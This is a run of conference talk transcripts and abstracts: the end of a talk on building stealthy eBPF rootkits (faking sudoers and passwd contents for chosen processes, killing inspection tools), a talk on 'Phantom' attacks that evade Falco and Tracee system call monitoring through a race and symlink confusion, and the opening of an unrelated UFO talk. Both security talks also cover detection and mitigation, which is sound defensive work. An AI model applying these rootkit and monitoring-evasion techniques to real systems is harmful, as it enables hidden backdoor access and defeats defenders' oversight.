probably be noticed but it's certainly a possible way to prevent an action from occurring. Now killing every process that attempts to open any file is going to be a quick way to having a really bad time so thankfully ebpf programs have lots of ways to tailor an action based on who or what is performing it. So ebpf programs can do different things based upon the process name, the user id, the value of arguments being passed or returned from that function and it can even take cues from other ebpf programs. So for example, it could only start altering, tampering with the read calls from a file only after a connection from a specific IP address has occurred. So looking back to our ssh example, to bypass multi-factor, ebpf can simply overwrite the data being read from the pam configuration files to remove any mention of multi-factor. It could then even overwrite the data in xypassword and xyshadow to insert a fake user account and password which would enable logging into the machine with a completely fake set of accounts. By having ebpf only target the ssh process, it means to add administrator using tools like cat or vim or a security tool or even to file forensics looking the actual file on disk, all of these will only show the normal unedited file. Simply ssh will be presented with the warped reality version of this data. So now it's time for some demo. The first demonstration that we're going to go through is the ability to replace text within uptree files. So we can see in the shell on the top right that there is a folder with a file called file and when we look inside this file we see the text this is real data. So now we're going to go ahead and load up the first of our ebpf rootkits into this shell on the left. So this rootkit is going to look for any type of process is opening the word file and it's going to replace any data that contains the text real with the word fake. But specifically it's not going to affect every process, it's only going to affect children of this specific process ID which we can see that matches with our shell on the right. So we're going to go ahead, our rootkit has now started and now back to our shell when we go to read this file we can see that the data has been changed and it says this is fake data. And in fact the log from the rootkit actually says that it did detect that this process started which was cat and it replaced the text that that process read. But what is interesting if we go to this shell now on the bottom right because this is a different shell with a different process ID even though we're in the same folder and we look at the same file it sees the unaltered data. So this is a technique that has many many uses. The example that we've used in the presentation is this is a way that you can add a user into the etsy password file but only do that for an SSH process and not for any auditing software or system administrator having a look at that file. So the next demonstration we're going to go through is the ability to stealthily enable a user to use sudo to become root. So typically on this machine if we have a look at this shell in the bottom right this is running as the user called low priv and if low priv wanted to become root using sudo well we can see low priv is not allowed to in the sudo file. And in fact if we use the root shell on the top right we can double and triply confirm that low priv is not in this list. So first off we can use the sudo-l command to say hey what privileges does sudo believe this user to have and when we run it we see user low priv is not allowed to run and in fact we can even at this most basic level just go and read the etsy sudoers file and look for the user low priv and sure enough that user is not in there. So that's this user low priv is definitely not able to become root using sudo. That is until we run the second of our ebpf rootkits on the left. So this one is going to look for any time anything that is opening specifically sudo is going to try to open the etsy sudoers file and it's just going to alter the text in that file to say hey low priv is actually in there and they do actually have those privileges. But it's only going to do this not only when just sudo is running but only when sudo is being run specifically from low priv. So now this rootkitter started if low priv were to use sudo again and say who am I. Well look at this it can become root. In fact it didn't even need to enter its password. So how does that work. Well so if as low priv we now ask sudo to tell us hey what privileges do you think I have. We can see that from when sudo is running as low priv it says hey low priv has the ability to do anything at once without even needing to add in a password. But even with this rootkit running if we were to check these permissions as a different user it still says hey low priv is no longer here and if we check that file it still says that low priv is not in there. So this file is only altered not only when it's just a sudo process running but only when it is a sudo process being run by that low priv user. Okay the last example that we're going to go through is the ability to kill arbitrary processes as a sort of self-protection idea. So typically an administrator can use a tool called BPF tool and this lists the running ebpf programs that are running on that system and it's got the ability to see what programs are running so for example we can see a lot of ebpf programs that actually relate to system D that are currently running on this system. And BPF tool has the ability to list the running processes to dump out the instructions and even seeing what process IDs are actually related to that ebpf program. So this is a good way for administrator to see what ebpf programs are running to potentially discover something like an ebpf root kit. So what this so we're going to load up a root kit that is running on the left and now if we attempt to use BPF tool to list the processes the process just gets killed before that information happens. So this is pretty extreme but this demonstrates that ebpf has the ability to sort of protect itself by just killing any process that is attempting to do any sort of investigation. So now we're going to cover some other features of ebpf and they get into some limitations of it. So three features that we haven't yet covered but I think are definitely worth mentioning. Firstly on some network cards you can actually run the ebpf programs on the network hardware itself instead of in the kernel. So for regular developers this is great because this can drastically increase the packet processing speeds but from a root kit perspective this is interesting to note because what this means is that any packet alteration made by an ebpf program that if this program is running on the network card this will occur after the Linux kernel has potentially scanned that packet for anything malicious. So if you want to send a packet to a malicious IP address but send it to a benign IP address then only once it's left the kernel and then inside the network card do you alter it to the dodgy IP address? Well any security system that's running in the kernel won't see that alteration. So secondly up until recently ebpf programs that were attached to kernel functions or syscalls require their user space loader to continue to run once the program is up and running and in fact if that user space loader were to exit then the kernel would just assume that you also want to stop running the ebpf programs and shut them down. Now if newer kernels there's been the introduction of these fentry and fexit type of bpf programs. Now these actually have the ability to be pinned to this sysfsbpf folder which what this means is a special file gets created under this folder one for each bpf program and then for as long as this file remains there the loader is free to exit, delete itself, be completely removed and the ebpf programs will continue to run. And when you want to stop them you just delete the files. So finally the thing worth mentioning is so the as we said before the bpf verifier puts strict limits in how complex an individual ebpf code program can be but they exist a mechanism to chain multiple programs together using the bpf using this helpful function called a bpf tail call. Now this requires some preparation and making use of those ebpf maps we mentioned but the end result is the system as a whole can be much more complex than what a single ebpf program is allowed to be. So for example on the right this is four call graphs that from four different ebpf programs that actually just make up one half of that text replacing root kit that we just demonstrated. Now each part, each individual program is pushing the limit on what a single ebpf program is allowed to do but all combined the system as a whole can be much much more complex. Now there's a number of limitations to writing a root kit using ebpf. So the first one is when using the bpf write user function to overwrite the buffer there is a small window of time between when the syscall fills the data inside the buffer and when ebpf overwrites it. Now this time window doesn't matter in single threaded programs because their code execution is not going to return to the user space program until after ebpf has done its thing but in a multi threaded program a second thread could be constantly reading the contents of that buffer and actually get read what is the true data from the syscall before ebpf has a chance to tamper with it. Now the first major issue to using ebpf as a root kit is that programs don't persist across a root kit across a reboot. So what this means is when a machinery starts the user space loader is needed to run again to load and attach all those ebpf programs back into the kernel. Now the second major thing is that ebpf programs can't write to kernel memory because this would almost certainly break those safety guarantees of ebpf. What this means if a security tool is running in the kernel such as auditd or ellenic security module these are going to be unaffected by ebpf's tampering. But one thing to note about these is that while a security product might be running in the kernel they're usually administrated by user space tools. So if a root kit were to disable the security tool in the kernel but then lie to the user space controller about the current running status of the system that might be enough to fool the system into thinking that it's more secure than it actually is. Okay let's talk about the defensive side of things. So we're going to start with file forensics. So if you're looking to detect files that contain ebpf code there's a couple of things to think about. So for starters the file that gets generated by the compiler when compiling a program to bpf bytecode is actually an elf file where the bytecode is inside a name section within that elf. So what this means is that tools such as readelf or obj dump can actually be used to pass these files and extract the bpf bytecode. So for example the ebpf program on the top right is being attached to the execve trace point that tpe syscall execve enter. What happens is when this gets compiled that tpe syscall execve is actually becomes the name of the section inside the elf that contains the raw bytes. So you can use a tool then to read that section and extract the bpf bytecode. Now it's important to note that's just the object from the compiler that's not the user space loader because what gets sent to the kernel is just the bpf bytes. Now it's important to note that a lot of loaders are going to be written using this libbpf library because this is a library that is actually part of the linux source tree and makes it a lot easier to read and write and manage ebpf programs. Now if a loader is using libbpf what this library will actually do it'll actually embed the entire elf object from the compiler inside the user space loader. So you end up with an elf inside of an elf. And so therefore if you're wishing to extract the bytecode you would first need to look in the read-only data inside the loader, extract the elf from there and then pass and extract that data to find the correct section to get the bpf bytecode. Now once you do extract the bytecode the biggest thing to look for would be evidence of that bpf probe write user function. It might be more difficult to automatically tell if a network packet altering program is malicious or not but I can't imagine too many legitimate use cases of this bpf probe write user function. Now I haven't touched at all on what bpf bytecode instructions actually look like but the instruction call is that comes out of the first compiler is that example on disk so they're 85 and then the 24 matches with the bpf probe write user function. But if you remember the bytecode is architecture and kernel version agnostic. And so what happens is when this bytecode gets sent into the kernel as we explained the kernel will actually patch that 24 to match up with what is the correct address for that kernel. So if you're looking at the bytecode that's being stored inside the kernel you would actually then need to dynamically look up that memory address to determine that that is the probe write user function. Then if you're looking at the native code after the jit compiler inside the kernel then this is definitely just going to look like a regular call instruction. So you would need to look up that again dynamically look up that memory address to determine what that that is the probe write user function. So to protect a running system I think one of the strongest defenses would be to modern to that bpf syscall which you know you could use ebpf to monitor ebpf. So monitoring for what programs are loading and running ebpf programs is going to be a really good tactic because realistically there should only be a small number of known programs that are actually interacting with ebpf. Now if a program actually sounds suspicious because ebpf has intercepted the syscall you could actually extract the program's bytecode and then send it to somewhere else to be analyzed where you could detect your suspicious behavior in the code. So a lot of the defenses I've covered so far assume that an ebpf root kit is not already an installed and tampering with the system because if it is already running it actually would have the ability to either block or hide a bunch of these user mode process scanning files you know that are scanning files or attempting to load an ebpf program. But even kernel root kits have a hard time hiding from memory forensics which particularly if the machine is virtualized the memory forensics can be acquired from underneath the kernel at the hardware or hypervisor or even the physical level. Volatility is the name of an excellent memory forensics tool and in fact in this year's black hat the team is releasing some new plugins specifically around acquiring and analyzing Linux tracing forensics. Now as I'm pre-recording this talk I don't know exactly what they're going to cover but I did speak briefly with a number of the team members before I recorded this and I'm really excited to actually get a handle on and play with the plugins that they're producing because they sound incredibly interesting. So a one final prevention could be to just straight up disable any use of ebpf within the kernel. Now this requires you to recompile the kernel with the relevant flags disabled and by doing so you'd lose all the advantages of using ebpf for your own reasons but this is definitely an option for some. So additionally at the moment there is some discussions going on within the community about how to cryptographically sign ebpf programs in the same way that you can sign kernel modules. Doing so would allow a system to load only trusted ebpf programs but prevent unknown or untrusted programs from being loaded and used. Now implementing this is definitely non-trivial particularly due to that compilation step but some smart people are really looking at this and so in the future this may end up being the best defense against ebpf based rootkits. Okay before we finish quickly what else can ebpf do? So firstly ebpf now runs on Windows. So in May Microsoft released the start of a project on GitHub called ebpf for Windows. It's in the early stages at the moment it's only got the network observability side of things and not the function hook or syscall hooking. But a lot of people including myself are really interested in seeing how this project evolves. So if you're interested in Windows at all I would highly recommend checking out this project. Now another thing I want to mention is that warping reality isn't just for attackers. So the same ideas around altering file or network data is also incredibly useful to reverse engineers either doing malware analysis or even bug hunting. So for example it's not uncommon for malware to perform a series of checks to determine if it's actually running on a victim machine or if it's running in an analysis sandbox such as cuckoo. Now the malware will check things such as the number of CPU cores, the machine uptime, the number of files within the temp folder. It might even actually look at the manufacturer as a network card to determine is that a real card or a virtual machine. So thanks to EBPF we can fake the responses to all of these questions and in fact we can fake them only for the malware so we don't accidentally break some critical piece of software that's running inside the sandbox. Then so now at the end of this talk I'm going to release a collection of EBPF programs and loaders that I've called bad BPF. So these programs demonstrate a number of the techniques we've discussed and demonstrated today and they should have enough documentation and comments to help you understand exactly how they work. They cover a range of actions from hijacking exact vehicles to load arbitrary programs, allowing the user to become pseudo or the program that replaces arbitrary text in arbitrary programs. Which because basically everything in Linux as a file this can be used to hide kernel modules, adding fake users to Etsy password or faking them back addressed from a network card. So we've covered a lot today and honestly the internals of EBPF and using EBPF defensively could be entire talks on their own. But I hope you've at least learnt things about how kernel RIT kits are great but they're also incredibly risky and I hope you've learnt how EBPF can remove that risk while keeping the same ability to hide data from administrators and provide backdoor access to a machine. And I really hope you've come away with some ideas on how to detect and prevent EBPF RIT kits from being deployed. Because I think this safety and portability is going to mean that we're definitely going to start seeing actual EBPF RIT kits appear in the wild before too long. Now there's a lot of links on this page. I think if you're interested in EBPF I would absolutely recommend checking out the community website and Slack. There's a bunch of really cool people sitting on that Slack who are really great at helping people learn more about the system and answering any questions that people have. Now there's also been some other offensive EBPF talks in the past if you're interested in the offensive side. So including one actually just the other day from the data dog people. So I would definitely recommend checking those talks out if you're interested in this. Finally I've got some thanks. Thank you very much to Corey for being incredibly supportive as I've delved into the corners of EBPF. And definitely thanks for maybe for helping me workshop some of the more ridiculous ideas that I had when I was designing this talk. And then definitely thank you to my family. This recording was done during the middle of a pretty hectic time involving the pandemic and daycare illnesses and all that sort of fun. I've been very lucky to have a partner that's supporting me as I ramble into a camera that is many, many, many miles away from DEF CON. Okay so with that I'll end this talk with a picture of my dog. Thanks for watching. I'll be around on the Discord if you have any other questions. Otherwise feel free to reach out to me on Twitter, email, GitHub, etc. And thank you for watching.
|
With complete access to a system, Linux kernel rootkits are perfectly placed to hide malicious access and activity. However, running code in the kernel comes with the massive risk that any change to a kernel version or configuration can mean the difference between running successfully and crashing the entire system. This talk will cover how to use extended Berkley Packet Filters (eBPF) to create kernel rootkits that are safe, stable, stealthy, and portable. eBPF is one of the newest additions to the Linux kernel, designed to easily load safe, constrained, and portable programs into the kernel to observe and make decisions about network traffic, syscalls, and more. But that’s not it’s only use: by creating eBPF programs that target specific processes we can warp reality, presenting a version of a file to one program and a different version to another, all without altering the real file on disk. This enables techniques such as presenting a backdoor user to ssh while hiding from sysadmins, or smuggling data inside connections from legitimate programs. This talk will also cover how to use these same techniques in malware analysis to fool anti-sanbox checks. These ideas and more are explored in this talk alongside practical methods to detect and prevent this next generation of Linux rootkits. REFERENCES: - DEFCON 27 - Evil eBPF Practical Abuses of In-kernel Bytecode Runtime - A talk about abusing eBPF for exploitation and privilege escalation - eBPF Website - https://ebpf.io - A website by the eBPF community with documentation and links to existing projects - eBPF Slack - https://ebpf.io/slack - A Slack channel run by the eBPF community - Libbpf Bootstrap - https://github.com/libbpf/libbpf-bootstrap - A sample project designed to provide a template to creating eBPF programs with Libbpf
|
10.5446/54228 (DOI)
|
Hello everyone. Today we're going to talk about Fenton attack evading system call monitor. My name is Rex. My name is Julia. So imagine an attacker compromise your Linux infrastructure. So the attacker first compromise a web app through a web app remote execution and then it launches a reverse shell. Then it discovered a vulnerability on the system. He can activate privileges using the pseudo vulnerability. CV 2021 31 56. Then he's looking for secrets on the system. So he read the Etsy shadow file and then he discover additional lateral movement opportunities by reading the SSH process environmental variable. Then he later move to the second machine using SSH hijack. As he is celebrating this moment he discovered that his reverse shell connection is gone and it doesn't take him for too long to discover that he his IP is completely blocked. Now let's take a look at the other side of the story. While all this is happening our security engineer has received a bunch of slack messages for the alerts generated by his latest cloud workflow protection software. The reason that the software can discover all these activities precisely is because it monitors the system calls and other process related data. So for example when the attacker launches the reverse shell there will be a connect system call and there may be additional system calls depends on the reverse shell that he uses. This is similar for the other activities and through this talk we are going to use open as system call as an example. So let's take a look at how one can use system calls and other process information to detect a attacker reads at the shadow. So here's an example rule. The rule is trying to detect untrusted programs reads the at the shadow. Let me explain what the rule means. It detects that there is an open at or open system call with the recommission and the file name is equal to at the shadow and also the program is not in the allow list that allows to read the at the shadow. So from this rule it should be very obvious that the ability to precisely monitor system calls and other system call related data is critical for the detection of this attack. The agenda of this talk is we will talk about system call monitoring in more detail and then we'll talk about the two open source system call monitoring project that we analyze and then we'll talk about the first vulnerability the top-toe issue which we use Benton v1 attack to exploit and then we'll talk about the second vulnerability a semantic confusion issue which we use Benton v2 attack to exploit and finally we'll conclude the talk with takeaways. With that I will hand over to Junyuan to talk about the system call monitor. Yeah so as Rex mentioned system call monitoring is very important to detect threats. So what is this call monitoring? We can define it as a technique to verify whether the application system call conferred to the rule that's specified the program behaviors at runtime. Here is the graph showing how system call monitoring works. When application system call is involved system call code path is executed if there are any hooks in a code path the attached program will be called to collect system call data. For example system call arguments the data are sent to user space monitoring agent. The monitoring agent will check if application system calls conferred to the user defined rules if not the case it may generate errors. So typically at least two steps should be include for system call monitoring. One step is call system call interception which is to get notified if target system call are invoked. In order to intercept system call you can use trace point or roaches point. Both of them are static hook placed in a kernel code. Roaches point are EBPF alternatives to standard trace point. It's faster because it provides slow access to the arguments without processing. For this call interception the kernel provides two roaches points six enter and six exit. This roaches point can be called this function trace system enter and trace system exit respectively. The first arguments of this function are PT register structure saving user registers in user kernel mode switching in it includes system call arguments. The second parameters is six call number. If any progress attached to this roaches point it will be executed with the same arguments as functions. Trace point has low overhead but only provides static interception. Different from trace point Kpro or Kretempro provides dynamic hook in a kernel. Using it we can register the progress on kernel instructions for example on system call code pass. When the instructions are executed it will trigger register programs. Kpro can be inserted on almost any instructions in a kernel. However Kretempro can only be inserted in function entry and exit. Kpro provides dynamic hook but is slow compared to trace point and you need to know exactly how data is placed on a stack or registers in order to read system call data. You can also use LDP log trick to intercept system call but it's not working in all cases for example application is statically compiled. Key trace system call provides another way to intercept system call however the overhead is high. The second step of system call monitoring is called system call data collection which is to collect system call data. For example system call arguments are via notified by system call events. The program used to collect system call data is called tracing program. For example you can use the tracing program to collect system call arguments. As we mentioned before tracing programs can attach to different hooks like trace point, raw trace point, Kpro or Kretempro. When the hooks fire tracing programs are called to collect data. There are different ways to implement tracing programs to collect system call data. You can use Linux native mechanisms like ftrace or perf events. You can also implement the trace programs in kernel module or ebpf programs which allow the execution of user code in a kernel. The open source project FACO and Tracee both use the similar techniques to monitor Cisco. FACO is originally created by SysTick. It's one of the two security and compliance projects and the only endpoint security monitoring project in CNCF in Cubating's projects. It has two 3.9 kth github stars. It actually consumed kernel events and enriched them with information from cloud native stack like Linux containers and so on. FACO supports both ebpf and kernel module implementation for the tracing program. Tracee on the other hand is originally created by Alquac security. It has 1.1 kth github stars. It's basically a runtime security and forensics tools based on ebpf. So unfortunately the open source projects or other projects using the similar techniques are vulnerable to be attacked during Cisco monitoring. The first vulnerability is time of check, time of use. During time of check, tracing programs collect Cisco data. During time of use, Cisco data used by kernel is different from what tracing program check. Let's take open as a example. The second parameter is called find name which is the pointer pointing to user space buffer between time of check and time of use. This pointer is vulnerable to be modified from user space. So we will introduce phantom B1 attack that can get the problem, exploit the top-tier issue. The second vulnerability is semantic confusion. It means kernel interprets data differently from tracing programs. For example, symbolic link is interpreted differently by the kernel and tracing programs. We will also introduce phantom B2 attack that can exploit semantic confusion. We will also demonstrate FACL is vulnerable to both phantom B1 and B2 attack while tracee is only vulnerable to phantom B1. In order to understand tactile, we used over that system call for example. We use kernel version 5.4.0 but regardless of the kernel version, if the monitoring software use trace point in this way, the tactile vulnerability will exist. To simplify, we only show the code that is related to the attack. When open-app system call is invoked in applications, Cisco handler will execute trace 6 enter function with two arguments. As we mentioned before, if any tracing program attached to this enter trace point, the program will be executed. After that, Cisco handler look up Cisco table and jump to open-app system call to open the file. Before return to applications, the handler will call trace 6 access with exactly the same arguments as trace 6 enter. So similarly, if there are any tracing programs attached to 6 access trace point, the program will be executed. As you mentioned before, the second arguments of open-app system call is find name pointer pointing to the user space memory. The find name is passed to do system open function and the kernel pop it to kernel buffer temp using get name function. After that, kernel use the kernel buffer to call internal function do file open to open the file. This is time of use for system call arguments by the kernel. If we divide the open-app system call co-pass into two parts based on the get name function, we get true sub co-pass cp1 co-pass 1 and cp2 co-pass 2. In cp1, the find name pointer hasn't been copied to the kernel buffer. In this case, no matter where we place the host in cp1, the attached tracing program will have to read user space buffer in order to get the find name. This is vulnerable to be changed in user space attacker. For example, if we attach tracing program to 6 enter trace point or to do 6 open using kpro, during time of check, the tracing program will have to read the user space buffer to get the find name. In cp2, user space memory has been copied to the kernel buffer making it not vulnerable to be changed from user space. For example, if we attach tracing program to the entry of do file open function using kpro, the tracing program can read the kernel buffer tab to get the find name. That kernel buffer is not vulnerable to be changed for tactile attack. However, if the hook are placed improperly in cp2, tactile is still possible. For example, if tracing programs attach to 6 axis trace point, it will read the user space buffer to get the find name. As we mentioned before, we use kernel version 5.4.0, but regardless of the kernel version, if the monitoring software use the trace point in this way, this vulnerability will exist. FACO is vulnerable to tactile and the vulnerability is tracked by CVE 2021 3355 with the scores 7.3. In particular, the vulnerability exists for FACO with the version older than 0.29.0 or open source sysdick. It also affects some commercial versions based on the open source agent. This was confirmed by the open source maintainer. Please contact the vendor for the versions. The reason why FACO is vulnerable to tactile vulnerability is that they use sysenter and sysaxis trace point to intercept system calls. In that case, user space pointers are read directly by FACO trace program in both kernel module and EBPF programs in permutations. In order to demonstrate the generality of FACO, we evaluate the syscalls in FACO rules. Please note that we only consider system calls that includes user pointers as arguments like open-s system call. And we found that FACO is vulnerable to monitoring most of syscalls that we evaluate except exact V-syscalls because FACO doesn't read user pointers for exact V-syscalls arguments directly. Instead, it reads the data from kernel data structure. So we evaluate trace 0.4.0 and we found that it's vulnerable to many system calls like connect system call. One thing I need to mention is there's no CVE given because the trace C also mentions that FACO attacks on syscalls records or tracer is a well-known issue and trace C is no exception and also agrees on the fact that there's no CVE or normal findings and therefore we could talk about it publicly. I will let the audience to interpret. So I will hand over to Rex to explain and demo the Phantom V1 attack. Alright, so the high-level idea to exploit the top two issue is fairly simple. So first of all we want to trigger the target system call with malicious arguments and we'll let the kernel to read the malicious argument and perform the intended malicious action for us. After the kernel reads it, we will override the data structure pointed by the user space argument pointer with benign data and at sys exit, the tracing program reads the data structure pointed by the user space pointer and checks the benign data against the rule and therefore you will not fire. Although the high-level plan is so simple there's a few technical challenges that we need to overcome. First one is when does the kernel threat read it and how can we synchronize the override with the kernel threat read? Are the reading windows big enough for the system calls that we're going to attack? And how do we ensure the tracing program gets the overwritten copy all the time? So before I dive into the step-by-step exploitation, there are a few primitives that we use in the exploit which I want to talk about. First one is user for fd system call. The system call is designed in a way that the user a user thread can handle page fault. But page fault is traditionally handled by the kernel. So what's the initial design intention for this? This was designed for memory externalization. In the case where you're running a distributed program, you can run compute node and memory nodes. When the compute node needs a particular memory that doesn't exist in the compute node, the kernel triggers the page fault and the user space for handler, it's going to reach out to the memory node to get the desirable memory. On the other hand, if the compute node has memory pressure, it will send those memory pages back to the memory node. One very important fact about user for fd is that once the kernel thread triggers the page fault, the kernel thread is completely paused and wait for the user space program to respond. As some of you may already be aware of, this has been used quite a bit in exploiting kernel risk condition bugs. The other two primitive I want to talk about, one is interrupts and the other one is scheduling. So an interrupt notifies the processor with an event that requires immediate attention. It will diverge the program control flow to an interrupt handler. Let's look at the picture on the right side. So we have two cores and we have two tasks running on each core corresponding it. On core zero task A issues a system call A and then the control flow transferred with kernel thread to handle the system call. While it is running, the user thread on the core one triggers an interrupt and the way it triggers the interrupt is indirect interrupt using system call. Once the interrupt is triggered, its core zero will execute the interrupt handler and after the interrupt is handled, it will return back to the system call routine which handles the system call. So there are different ways to indirectly trigger system call, indirectly trigger interrupt using system call. One way to do is to trigger a hardware interrupt. So this can happen when a program issues a connect system call. The CPU that is dedicated to handle networking interrupt will get interrupted. Another way to trigger this interrupt is called inter processor interrupt. This can be done by issuing an end protect system call. So once the end protect system call is issued, the memory page permission is changed and therefore all the CPUs that are caching those memory permissions need to be updated with the right memory permission. The scheduling primitive that we use, one is a sex scheduler. This will change the scheduling priority of a particular task. This is optional in the exploit because for system calls with longer top-top windows such as networking system calls, we find that it's not needed to reliably exploit the top-top issue. But with system calls related to files, the top-top window is typically smaller. And with the capability, we can 100% reliably exploit the top-top issue. And then the second primitive we use is set affinity which will pin the task to a particular CPU. Okay, so let me talk about the step-by-step exploitation in detail. Initially we need to do some setup. So we set up three main thread, a user for FD thread. The user for FD thread can run any CPU and also an override thread. So the main thread will pin to a CPU 3. The choice of 3 here is because we run our experiment, one of our experiment, on a four-core system and CPU 3 is used to handle the networking interrupt. But if you're using IPI interrupt, it can be any CPU. And then the main thread will map a memory page A. The page is not allocated and it will register the user for FD thread to handle the page file generated for this page. On the override thread side, we pin it to a different CPU because we want to reduce the interference between the override thread and the main thread. And then the override thread will just block on conditional mutex once it started. After this setup, the main thread will trigger a system call, in this case open-at, and it will specify the file name argument to point to page A. Now keep in mind that page A at this point is not allocated and so the kernel thread will trigger a page file. Once the page file is triggered, the user for FD thread will write page A with the malicious file name and then it will release the conditional mutex. And then it will issue a auto-system call to return execution back to the kernel. Now once the conditional mutex is released, the override thread will start running and it will first write the behind file name. In the last stage of this tech, once execution return back to the kernel, the kernel will use copy from user and you will get the malicious path name. This is a time-up check and it keeps executing until, as this exit, the trees program will read the register and the reference the file name value again. This is a time-up check. So this is the talk-to window we have and let's see how we can use the override thread to make this override successful. So after it writes a benign name, we issue a memory consistency update using CPU instructions. As the memory consistency update takes place, we want to increase the talk-to window such that we have enough time to update the value for all the CPUs. So what we do is that it will issue a interrupt using system calls and this will increase the talk-to window size. And then the memory consistency update applies. So the file name now points to the benign file name and then the treesing program will read out the benign file name and check it against the rule which will not fire anything. Now let's take a look at the demo. Okay so in our first demo we're going to attack SysDig for using connect system call as an example. So what we'll do is we will run SysDig and ask it to monitor connect system call and just filter the data on our attack program. And then on another window we will use TCP dump to monitor all traffic going to port agent. And then we'll run our attack program. The attack program it will connect to 1.1.1.1.1 but then you will override this IP address with IP address from linking.com. Okay so we can see that the TCP dump report traffic actually going to 1.1.1.1.1. This is what happens on the wire. But SysDig will report that okay this program attack connect is actually connecting to 13.107.42.14 which is the IP address on by linking.com. And therefore we showed that we can write this with arbitrary value. Okay so now we'll show a second demo. In this demo we'll show an attack on SysDig on the open add system call. Now our demo setup is slightly different. So for open add the top-to-window is small. So if we don't use a capsis nice sometimes the attack will fail. But if we assign capsis nice we can achieve 100% reliable exploitation. Keep in mind that because the override thread has the highest scheduling priority so sometimes it can write the file name faster than the kernel read. So when that happens the system call will get the benign file name and the SysDig will also get the benign file name. So there's no harm being done and no other being fired as well. And therefore we run the experiment 15 times using our script and each time we check what is what is a SysCover rate and what is SysDig read. And that will compute the result based on each observation. So what we'll do is we'll print out the number of success attack the number of attack that has no harm and also the success rate. Okay so as you can see here in the 15 experiment we succeed three times no failure and 12 times there's no harm. And therefore the success rate is 100%. Okay so lastly we'll show a demo on 3C as well and here we will attack connect call in 3C. The attack setup is very similar to what we have for the SysDig. Again 3C will monitor the connect system call and we'll just filter the data on our attack program reported by 3C. And then we have TCP done monitoring report 80 and then we run the attack. As you can see that the actual traffic going on the wire is going to 1.1.1.1 but 3C reported that the traffic going is going to 13.107.42.14 which is overwritten by us. Okay so this is I just want to reiterate that the capsis nice is optional it depends on the system call that you're attacking and for networking system calls typically this is non-needed and for file base typically this is needed to achieve a hundred percent reliable exploitation. And then I'll talk about the second attack the semantic confusion. The idea of the attack is fairly simple. The kernel and the tracing program can interpret data differently. So we use file link as an example. When the kernel reads a link it will try to resolve the link and read the actual file. But when the tracing program read a link it will just take the link as the argument and use that to track in the loop. So file call is vulnerable to this semantic confusion attack because it didn't resolve the link in the system call. There's no CV given because they mentioned that same link and same link add link and link add are all monitored by FALCO. But practically detection team need to track all these same link add or link link add to all these file-based rules if the attacker is using those. And tracing is not vulnerable to this attack because they use a mitigation in RSM hook which Junya will talk more in a later slide. So I just want to quickly show the example of Fenton v2 attack in SysTik. Remember this rule that we talked about at the very beginning and see that the file name actually we checked whether the file name is at C shadow. So in order to exploit this we can create a file link temp shadow pointing to at C shadow and then the tracing program will read the same link at C shadow. And then the system call open add sees the temp shadow and track against the rule. It doesn't match at C shadow and therefore the rule is bypassed. So with that I will hand over back to Junya to talk about mitigations. Yeah so for mitigations there are two basically two approach for the Fenton attacks. So one is to detect the potential exploit is happening. This was proposed and partially implemented by its faculty. It has includes in faculty release in version 0.29.0. Basically it's trying to detect the following behaviors used by the exploits. For example it detects the previous use of user 4fd system call. This was implemented and detect a user registers memory address range and also detect a user copying continuous memory trunk into a user of D register range and so on. The second way to mitigate Fenton attacks is to read the data that actually used by the system call or the kernel. In order to do that you can hook LSM functions to get those system call data that is actually used. LSM hooks function is a list of checkpoints that are placed in a kernel before operations happens on a kernel objects. So here is the table showing a list of the LSM hooks used by tracee version 4 and the second column shows the system call that was that is protected by the LSM hooks from Fenton attacks. You can also read those data that's used by the kernel from kernel data structure. For example in order to read the arguments of exactly tracing programs can read it from the M structure from the kernel. I will hand over back to Rex to conclude. Okay so basically in this talk we show that Fenton attack is generic and it exploit the fact that kernel and tracing program can read data at different times. This is exploited by Fenton v1 and we also show that the Fenton attack can exploit it the fact that kernel and tracing program can interpret data differently. This is exploited by Fenton v2. We demonstrated that kernel raw tracepoint on system call are not ideal for secure tracing and for other tracing implementations such as Kpro it could also be vulnerable if it is not implemented properly. For mitigation one can use detection for abnormal usage on user 4 fd or to ensure that the kernel and the secure tracing program reads the same data and interpret the data in the same way. If you're interested in discuss further feel free to contact me on Twitter and we'll share the GitHub link at Twitter as well. So before we conclude we also want to thank all these people during our research Chris and Joe for the discussion on the eBPF and kernel tracing and top-toe also you on top-toe and lastly we really appreciate the Falco open source team they are very professional handling the issue we have really good discussions on there. Thank you everyone.
|
Phantom attack is a collection of attacks that evade Linux system call monitoring. A user mode program does not need any special privileges or capabilities to reliably evade system call monitoring using Phantom attack by exploiting insecure tracing implementations. After adversaries gain an initial foothold on a Linux system, they typically perform post-exploitation activities such as reconnaissance, execution, privilege escalation, persistence, etc. It is extremely difficult if not impossible to perform any non-trivial adversarial activities without using Linux system calls. Security monitoring solutions on Linux endpoints typically offer system call monitoring to effectively detect attacks. Modern solutions often use either ebpf-based programs or kernel modules to monitor system calls through tracepoint and/or kprobe. Any adversary operations including abnormal and/or suspicious system calls reveal additional information to the defenders and can trigger detection alerts. We will explain the generic nature of the vulnerabilities exploited by Phantom attack. We will demonstrate Phantom attack on two popular open source Linux system call monitoring solutions Falco (Sysdig) and Tracee (Aquasecurity). We will also explain the differences between Phantom v1 and v2 attacks. Finally, we will discuss mitigations for Phantom attack and secure tracing in the broader context beyond system call tracing. REFERENCES: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33505 https://i.blackhat.com/USA-20/Thursday/us-20-Lee-Exploiting-Kernel-Races-Through-Taming-Thread-Interleaving.pdf https://www.youtube.com/watch?v=MIJL5wLUtKE https://dl.packetstormsecurity.net/1005-advisories/khobe-earthquake.pdf
|
10.5446/54230 (DOI)
|
Hello again. This is Richard Thien showing up 25 years after I showed up to speak here at DEF CON for the first time to address the topic UFOs, misinformation, disinformation, and the basic truth. A lot has been happening since I made a talk about this subject eight years ago, which is on YouTube, and I'll refer to that subsequently. But I want to say that reality, as Philip K. Dick said, will not go away just because we refuse to believe in it. And what is happening right now is real. In fact, it's been real for a long time. So, given all the hullabaloo about UAPs, as we now call them in UFOs, what is happening? Well, for one thing, those videos are happening. And I'm not going to show them to you again, because you've seen them. They're widely available on the Internet. You've seen the tic-tacs, and you've seen the videos from the 2004 Nimitz incident, and you've probably seen that object going in and out of the water on its way from U.S. territorial waters toward Cuba. Those are all very interesting and all over the web. So, those videos and what they're getting people to say and think about are happening. And officials commented on them positively in public, which is a near first. So, that's happening too. They're not making jokes about little green men or conspiracy theories, eh? In addition, Luis Elizondo and his narrative is happening. And he's telling the world that he left the UAP task force so he could bring his knowledge, his concerns into public debate. Now, this is where I would be showing you my second slide, which is a picture of Luis Elizondo. And no matter what we did and 